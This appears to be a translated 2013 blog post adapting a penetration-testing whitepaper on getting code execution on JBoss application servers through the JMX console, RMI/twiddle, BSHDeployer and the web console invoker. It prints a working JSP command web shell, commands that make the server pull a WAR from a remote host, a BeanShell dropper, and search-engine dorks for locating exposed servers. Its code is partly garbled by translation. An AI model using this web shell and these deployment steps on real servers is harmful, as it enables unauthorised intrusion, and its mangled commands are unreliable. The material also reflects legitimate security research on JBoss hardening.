Sleepy Dragon · 2013/07/23 19:28

0 x00 profile


JBoss Application Server (JBoss AS) is a widely used open source Java application server.

It is part of the JBoss Enterprise middleware (JEMS) and is often used in large enterprises.

Because the software is highly modular and loosely coupled, it is very complex, which also makes it an easy target for attackers.

This article points out the potential risks of the JBoss application server from an attacker’s point of view, along with examples of how to execute arbitrary code on the JBoss application server.

0 x01 JBoss overview

The JBoss application server is based on Java Enterprise Edition 1.4 and can be used on a wide range of operating systems, including Linux, FreeBSD, and Windows, as long as the Java VIRTUAL Machine is installed on the operating system.

JBoss application Services Architecture

Java Management Extensions (JMX)

Java Management Extensions (JMX) is a standardized architecture for monitoring and managing Java applications. JMX has three layers:

The JMX architecture

Instrumentation Level: mainly defines the information model. In JMX, the various managed objects exist as administrative artifacts that are registered with the MBean server when they need to be managed. This layer also defines the notification mechanism and some auxiliary metadata classes.

Agent Level: Mainly defines various services and communication models. At the heart of this layer is an MBean server with which all administrative artifacts need to be registered to be managed. Management artifacts registered with the MBean server do not communicate directly with remote applications; they communicate through protocol adapters and connectors. Protocol adapters and connectors also register with the MBean server as administrative artifacts to provide the corresponding services.

Distributed Service Level: Mainly defines the management interfaces and artifacts that operate on the agent layer so that the administrator can operate the agent. However, the current JMX specification does not provide a specific specification for this layer.

JMX Invoker

Invokers allows client applications to send JMX requests for any protocol to the server.

These calls all use the MBean server to send to the responding MBean service.

Transport mechanisms are transparent and can use any protocol such as HTTP,SOAP2 or JRMP3.

Deployer architecture

Attackers are particularly interested in the Deployers module in the JBoss application server.

They are used to deploy different components.

The main components to be installed in this article:

JAR (Java ARchives) : The JAR file format is based on the popular ZIP file format. Unlike ZIP files, JAR files are not only used for compression and distribution, but also for deploying and encapsulating libraries, components, and plug-ins, and can be used directly by tools like compilers and JVMS. Include special files in the JAR, such as manifests and deployment descriptors, to indicate how the tool will process a particular JAR.

WAR (Web ARchives) : A WAR file is a JAR file that contains a component of a Web application, similar to Java ServerPages (JSP), Java classes, static Web pages, and so on.

BSH (BeanSHell scripts) : BeanSHell is a Java scripting language. BeanSHell scripts use Java syntax and run on JRE.

The most important JBoss application server deployer is MainDeployer. It is the main entry point for deploying components.

The path passed to MainDeployer’s deployment components is in the form of a URL:

org.jboss.deployment.MainDeployer.deploy(String urlspec)
Copy the code

MainDeployer downloads the objects and decides what SubDeployer forwards to use.

Depending on the type of component, SubDeployer (e.g. JarDeployer, SarDeployer, etc.) accepts objects for installation.

To facilitate deployment, use UrlDeploymentScanner, which also takes a URL as a parameter:

org.jboss.deployment.scanner.URLDeploymentScanner.addURL(String urlspec)
Copy the code

Incoming urls are periodically checked for new installations or changes.

This is how the JBoss application server implements hot deployment, where new or changed components are automatically deployed.

0 x02 attack


The WAR file

The easiest way to run your own code on a JBoss application server is to deploy a component, which JBoss can install via HTTP.

The WAR file package needs to contain a web.xml file in the Web-INF directory, outside of the actual application code directory.

This is a description file that describes what urls will be found later in the application.

The WAR file can be created using Java’s SDK jar command:

$ jar cvf redteam.war WEB-INF redteam.jsp
Copy the code

Redteam.war structure directory:

|-- META-INF
|   -- MANIFEST.MF
|-- WEB-INF
|   -- web.xml 
-- redteam.jsp
Copy the code

Meta-inf/manifest.mf is automatically created when a file is created with a JAR and contains information about the JAR, such as the main entry point of the application (the class that needs to be invoked) or what additional classes are required. There is no special information in the generated file, just some basic information:

Manifest-Version: 1.0 
Created-By: 1.6.0_10 (Sun Microsystems Inc.) 
Copy the code

The web-INF /web.xml file must be created manually. It contains information about the WEB application, such as JSP files, or more detailed application description information, what icon to display if an error occurs, or the name of the error page, etc

<? The XML version = "1.0"? > <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" Xsi: schemaLocation = "http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version = "2.4" > <servlet> <servlet-name>RedTeam Shell</servlet-name> <jsp-file>/redteam.jsp</jsp-file> </servlet> </web-app>Copy the code

Redteam content:

<%@ page import="java.util.*,java.io.*"%> <% if (request.getParameter("cmd") ! = null) { String cmd = request.getParameter("cmd"); Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr ! = null ) { out.println(disr); disr = dis.readLine(); }} % >Copy the code

The HTTP request:

/redteam.jsp? cmd=lsCopy the code

All files in the current directory will be listed, and the result will be returned with the following code:

while ( disr ! = null ) { out.println(disr); disr = dis.readLine(); }Copy the code

JMX Console

The JMX console is a component that allows direct interaction with the JBoss application server through a Web browser.

It makes it easy to manage JBoss servers, and MBean properties and methods can be called directly, as long as there are no complex parameter types in the parameters.

JMX Console default interface

This is usually the attacker’s first target.

Server – and ServerInfo – an

The properties of MBeans
jboss.system:type=Server
jboss.system:type=ServerInfo
Copy the code

Displays information about the JBoss application server and host system, including the Type and version of the Java VIRTUAL machine and the operating system.

An attribute of the

The JMX console is readable and actionable to MBeans and contains not only information about the JBoss application server itself, but also information about the host, which helps further attacks.

The shutdown() method of the MBean can shutdown the JBoss application server, and unauthorized JMX interfaces can lead to denial of service attacks.

Redteam. War is installed

The method properties of MainDeployer can be called in jboss.system in the JMX console.

The deploy() method can be called with a single parameter in a URL pointing to the WAR file that the server can access.

When the Invoke button is clicked, the JBoss application server downloads the WAR file and installs it, after which shell commands can be executed

The deploy () method

The JBoss application executes the ls -l command

RMI: Remote method invocation

The usual JMX console protection method is to add a password protection.

However, this is not the only way to access JBoss application server components. JBoss application servers often interact with client programming interfaces, and Java Remote method calls (RMI) also play an important role.

With RMI, local applications can access remote objects and call their methods. Communication between the client and server is transparent.

Java Naming and Directory Interface (JNDI) is an APPLICATION programming Interface (API), providing developers with a universal and unified Interface for searching and accessing various Naming and Directory services, similar to JDBC, which is built on the abstraction layer.

Existing directories and services accessible by JNDI are:

DNS, XNam, Novell Directory Service, Lightweight Directory Access Protocol (LDAP), CORBA Object Service, file system, and Windows XP/2000/NT/Me/ 9X registry, RMI, DSML V1 & V2, NIS.

Access mBeans through RMI

The RMI interface defaults to Cage on port 4444, and the JNDI interface defaults to 1098 and 1099.

To communicate with the JBoss application server RMI, you can use specialized Java programs. An easier way is to use Twiddle, including the JBoss application server installation.

$sh jboss-4.2.3.GA/bin/twiddle.sh -h A JMX client to 'twiddle' with A remote jboss server. usage: twiddle.sh [options] <command> [command_arguments] options: -h, --help Show this help message --help-commands Show a list of commands -H=<command> Show command specific help -c=command.properties Specify the command.properties file to use -D<name>[=<value>] Set a system property -- Stop procession options -s, --server=<url> The JNDI URL of the remote server -a, --adapter=<name> The JNDI name of the RMI adapter to user -u, --user=<name> Specify the username for authentication -p, --password=<name> Specify the password for authentication -q, --quiet Be somewhat more quietCopy the code

With Twiddle, the JBoss application server’s MBeans are called from the available command line via RMI. Windows is twiddle. Bat, Linux is twiddle. Sh to start twiddle. Like the JMX console, the properties of an MBEAN are readable and modifiable, and its methods can be called.

Displays information about the MBean server

$ ./twiddle.sh -s scribus get jboss.system:type=ServerInfo
ActiveThreadCount=50
AvailableProcessors=1
OSArch=amd64
MaxMemory=518979584
HostAddress=127.0.1.1
JavaVersion=1.6.0_06
OSVersion=2.6.24-19-server
JavaVendor=Sun Microsystems Inc.
TotalMemory=129957888
ActiveThreadGroupCount=7
OSName=Linux
FreeMemory=72958384
HostName=scribus
JavaVMVersion=10.0-b22
JavaVMVendor=Sun Microsystems Inc.
JavaVMName=Java HotSpot(TM) 64-Bit Server VM
Copy the code
Install redteam. War

Install the WAR file using the deploy() method with Twiddle’s help.

$ ./twiddle.sh -s scribus invoke jboss.system:service=MainDeployer deploy http://www.redteam-pentesting.de/redteam.war
Copy the code

Access the shell through the following URL:

http://scribus:8080/redteam/redteam-shell.jsp
Copy the code

BSHDeployer

Exploiting RMI attacks requires the JBoss application server to be able to access the remote HTTP server.

However, in many configurations, the firewall does not allow the JBoss server to make connection requests:

In order to be able to install redteam.war on the JBoss server, this file needs to be stored locally.

While JBoss doesn’t allow direct file uploads, with BeanShellDeployer we can create arbitrary files on remote servers.

BeanShell

BeanShell is a scripting language that runs on the JRE and supports regular Java syntax. It can be written quickly and no compilation is required.

BSHDeployer

BSHDeployer in JBoss server can deploy BeanShell scripts which are automatically executed after installation.

Installation with BSHDeployer is:

createScriptDeployment(String bshScript, String scriptName)
Copy the code
BeanShell script

You can use the following BeanShell script to put redteam.war on the JBoss server.

import java.io.FileOutputStream; import sun.misc.BASE64Decoder; // Base64 encoded redteam.war String val = "UEsDBBQACA[...] AAAAA"; BASE64Decoder decoder = new BASE64Decoder(); byte[] byteval = decoder.decodeBuffer(val); FileOutputStream fs = new FileOutputStream("/tmp/redteam.war"); fs.write(byteval); fs.close();Copy the code

Var is the base64 encoded string of the redteam.war file. The script generates the redteam.war file in TMP.

Install the redteam.war file

With Twiddle, you can use DSHDeployer’s createScriptDeployement() method:

$./twiddle.sh -s scribus invoke jbox.deployer :service=BSHDeployer createScriptDeployment "' cat redteam.bsh '" redteam.bshCopy the code

Tedteam.bsh contains the above BeanShell script, and JBoss server returns the address of the temporary file created by BeanShell upon successful call:

file:/tmp/redteam.bsh55918.bsh 
Copy the code

When deployed by the BeanShell script, the/TMP /redteam.war file is created and can now be deployed by calling the local file:

$ ./twiddle.sh -s scribus invoke jboss.system:service=MainDeployer deploy file:/tmp/redteam.war 
Copy the code

You can then access redteam-shell.jsp to execute the command.

Web Console Invoker

Controlling the JBoss server through the JMX console and RMI is the most common method.

There are also more subtle interfaces, one of which is the use of JMXInvoker in the Web console.

Web console

The Web console is similar to the JMX console and can also be accessed through a browser.

The default interface for the Web console:

If the JMX console is password protected, you cannot access the MBean functions through the Web console; you need to log in to access them.

Web console JMX Invoker

In addition to seeing the makeup interface and JBoss server information, the Web console can also monitor real-time changes in MBean properties.

Access the URL:

http://$hostname/web-console/Invoker 
Copy the code

This Invoker is essentially a JMX Invoker, not limited to the functionality provided by the Web console.

By default, access is unrestricted, so an attacker can use it to send arbitrary JMX commands to the JBoss server.

Install redteam. War

Install the redteam.war file with Invoker on the Web console.

Webconsole_invoker. Rb can directly call the Web control of JMX Invoker, using Java classes are: org. Jboss. Console. The remote. Util

The util. class file belongs to the JAR file of the JBoss server: console-Mgr-classes.jar, which provides methods:

public static Object invoke(
    java.net.URL externalURL,
    RemoteMBeanInvocation mi)
public static Object getAttribute(
    java.net.URL externalURL,
    RemoteMBeanAttributeInvocation mi)
Copy the code

The Properties and invoke methods of an MBean can be read from the Web console Invoker.

This class can be used with the webconsole_invoker.rb script as follows:

$ ./webconsole_invoker.rb -h Usage: . / webconsole_invoker. Rb [options] an  -u, --url URL The Invoker URL to use (default:http://localhost:8080/web-console/Invoker) -a, --get-attr ATTR Read an attribute of an MBean -i, --invoke METHOD invoke an MBean method -p, --invoke-params PARAMS MBean method params -s, --invoke-sigs SIGS MBean method signature -t, --test Test the script with the ServerInfo MBean -h, --help Show this help Example usage: ./webconsole_invoker.rb -a OSVersion jboss.system:type=ServerInfo ./webconsole_invoker.rb -i listThreadDump jboss.system:type=ServerInfo ./webconsole_invoker.rb -i listMemoryPools -p true -s boolean jboss.system:type=ServerInfoCopy the code

Use BSHDeployer to install the redteam.war file.

$ ./webconsole_invoker.rb -u http://scribus:8080/web-console/Invoker -i createScriptDeployment -s "java.lang.String","java.lang.String" -p "`cat redteam.bsh`",redteam.bsh jboss.deployer:service=BSHDeployer
Copy the code

Create a local redteam.war file on the remote server and now the second installment can install/TMP /redteam.war using MainDeployer.

$ ./webconsole_invoker.rb -u http://scribus:8080/web-console/Invoker -i deploy -s "java.lang.String" -p "file:/tmp/redteam.war" jboss.system:service=MainDeployer
Copy the code

Redteam-shell.jsp is accessible again.

JMXInvokerServlet

As mentioned earlier, the JBoss server allows any protocol to access the MBean server, and for HTTP, JBoss provides HttpAdaptor.

By default, HttpAdaptor is not enabled, but HttpAdaptor’s JMX Invoker can be accessed directly through the URL.

http://$hostname/invoker/JMXInvokerServlet 
Copy the code

This interface accepts HTTP POST requests and forwards them to MBeans, so similar to the Web console Invoker, JMXInvokerServlet can also send arbitrary JMX calls to the JBoss server.

Create the MarshalledInvocation object

The invocation of JMXInvokerServlet is incompatible with the Web console Invoker, so it cannot be invoked using the webconsole_invoker.rb script.

The MarshalledInvocation object will normally only communicate on the internal JBoss server.

The httpInvoker.rb script is similar to the webconsole_Invoker.rb script, but requires the JBoss server to activate HttpAdaptor

$ ./httpinvoker.rb -h Usage: . / httpinvoker. Rb [options] an  - j, --jndi URL The JNDI URL to use (default:http://localhost:8080/invoker/JNDIFactory) -p, --adaptor URL The Adaptor URL to use (default:jmx/invoker/HttpAdaptor) -a, --get-attr ATTR Read an attribute of an MBean -i, --invoke METHOD invoke an MBe an method --invoke-params PARAMS MBean method params -s, --invoke-sigs SIGS MBean method signature -t, --test Test the script with the ServerInfo MBean -h, --help Show this helpCopy the code
Install tedteam. War

Similar to the webconsole_invoker.rb installation.

How to find JBoss server:

inurl:"jmx-console/HtmlAdaptor"
intitle:"Welcome to JBoss"
Copy the code

From: Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN